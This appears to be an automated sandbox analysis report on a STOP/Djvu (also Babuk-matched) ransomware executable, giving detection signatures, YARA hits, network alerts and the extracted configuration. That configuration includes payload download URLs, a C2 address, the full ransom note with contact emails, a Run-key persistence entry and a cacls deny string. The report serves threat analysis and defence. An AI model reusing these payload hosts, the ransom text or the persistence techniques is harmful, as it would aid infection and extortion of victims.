Windows Analysis Report
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe

Overview

General Information

Sample name:c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Analysis ID:1390473
MD5:1aab5a9252e93871932cd7381693e199
SHA1:3b1ee795bc70733d1820a48d2ee4e2641b124ce1
SHA256:88968c3b8e6e3fce9e327cb0d92079b88a35962f0503edc0888d2d9883de87c6
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Babuk
Description: Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and an old 32-bit PE executable were also observed over time. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name: STOP, Djvu
Description: STOP Djvu is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as a marker to the encrypted file's name. It does not encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-OQnsJqCOOl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0734SwOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", 
"C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIkf6D3VPGtiABEC052HyrDbXophP7h+k\\\\nIOz0jtwFVvDc7r1gIAxAWPb4o2Fk47gJ3fxHLdJGcD6ITWvE04U\\/gybzgIY17AaE\\\\ndJzscVm3\\/TVhquTHfkmleHfH4lem7WBr+yAvsK9v2lTqABxYQs+HlakgFplsaaqv\\\\nqNvuh1QyTIPfXyqLyKtxf8xaSm+fsjLIzzBijqKIPl5LN3RQv1KbB\\/SXOgajs9J1\\\\nEGLIPKChAFu18rMsSGvhBzHldvq7HuocsesAMvzaBqgUULa6B\\/IFOmv\\/3VJo0NYz\\\\nLQIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfe888:$x1: C:\SystemID\PersonalID.txt
    • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfecec:$s1: " --AutoStart
    • 0xfed00:$s1: " --AutoStart
    • 0x102948:$s2: --ForNetRes
    • 0x102910:$s3: --Admin
    • 0x102d90:$s4: %username%
    • 0x102eb4:$s5: ?pid=
    • 0x102ec0:$s6: &first=true
    • 0x102ed8:$s6: &first=false
    • 0xfedf4:$s7: delself.bat
    • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      SourceRuleDescriptionAuthorStrings
      00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        SourceRuleDescriptionAuthorStrings
        4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
          • 0xfe888:$x1: C:\SystemID\PersonalID.txt
          • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
          • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
          • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
          • 0xfecec:$s1: " --AutoStart
          • 0xfed00:$s1: " --AutoStart
          • 0x102948:$s2: --ForNetRes
          • 0x102910:$s3: --Admin
          • 0x102d90:$s4: %username%
          • 0x102eb4:$s5: ?pid=
          • 0x102ec0:$s6: &first=true
          • 0x102ed8:$s6: &first=false
          • 0xfedf4:$s7: delself.bat
          • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
          • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security

              System Summary

              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
              Timestamp:02/12/24-01:36:15.166464
              Source IP:192.168.2.4
              Destination IP:199.59.242.150
              SID:2833438
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:02/12/24-01:35:56.488809
              Source IP:192.168.2.4
              Destination IP:199.59.242.150
              SID:2020826
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:02/12/24-01:35:56.488809
              Source IP:192.168.2.4
              Destination IP:199.59.242.150
              SID:2036333
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              AV Detection

              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeAvira: detected
              Source: http://colisumy.com/dl/build2.exe$runURL Reputation: Label: malware
              Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
              Source: http://zexeq.com/raud/get.phpURL Reputation: Label: malware
              Source: http://colisumy.com/dl/build2.exeURL Reputation: Label: malware
              Source: http://zexeq.com/raud/get.phpepURL Reputation: Label: malware
              Source: http://zexeq.com/files/1/build3.exeURL Reputation: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
              Source: http://zexeq.com/files/1/build3.exerunAvira URL Cloud: Label: malware
              Source: http://colisumy.com/dl/build2.exerunAvira URL Cloud: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true(Avira URL Cloud: Label: malware
              Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Avira URL Cloud: Label: malware
              Source: http://zexeq.com/files/1/build3.exe$runW=Avira URL Cloud: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Avira URL Cloud: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637foAvira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeAvira: detection malicious, Label: HEUR/AGEN.1319085
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-OQnsJqCOOl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0734SwOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", 
"C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wind
              Source: zexeq.com Virustotal: Detection: 20%
              Source: colisumy.com Virustotal: Detection: 19%
              Source: http://colisumy.com/dl/build2.exerun Virustotal: Detection: 16%
              Source: http://zexeq.com/files/1/build3.exerun Virustotal: Detection: 15%
              Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0 Virustotal: Detection: 15%
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe ReversingLabs: Detection: 86%
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Virustotal: Detection: 78%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe ReversingLabs: Detection: 86%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Virustotal: Detection: 78%
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoe Sandbox ML: detected
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F21178 CryptDestroyHash,CryptReleaseContext,0_2_00F21178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00F1E870
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00F1EAA0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1EA51 CryptDestroyHash,CryptReleaseContext,0_2_00F1EA51
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1EC68 CryptDestroyHash,CryptReleaseContext,0_2_00F1EC68
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F20FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00F20FC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_00F1E870
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_00F1EAA0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F20FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00F20FC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F21178 CryptDestroyHash,CryptReleaseContext,2_2_00F21178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1EA51 CryptDestroyHash,CryptReleaseContext,2_2_00F1EA51
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1EC68 CryptDestroyHash,CryptReleaseContext,2_2_00F1EC68
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00F0E870
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00F0EAA0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F10FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00F10FC0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F11178 CryptDestroyHash,CryptReleaseContext,3_2_00F11178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0EA51 CryptDestroyHash,CryptReleaseContext,3_2_00F0EA51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0EC68 CryptDestroyHash,CryptReleaseContext,3_2_00F0EC68
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F11178 CryptDestroyHash,CryptReleaseContext,4_2_00F11178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00F0E870
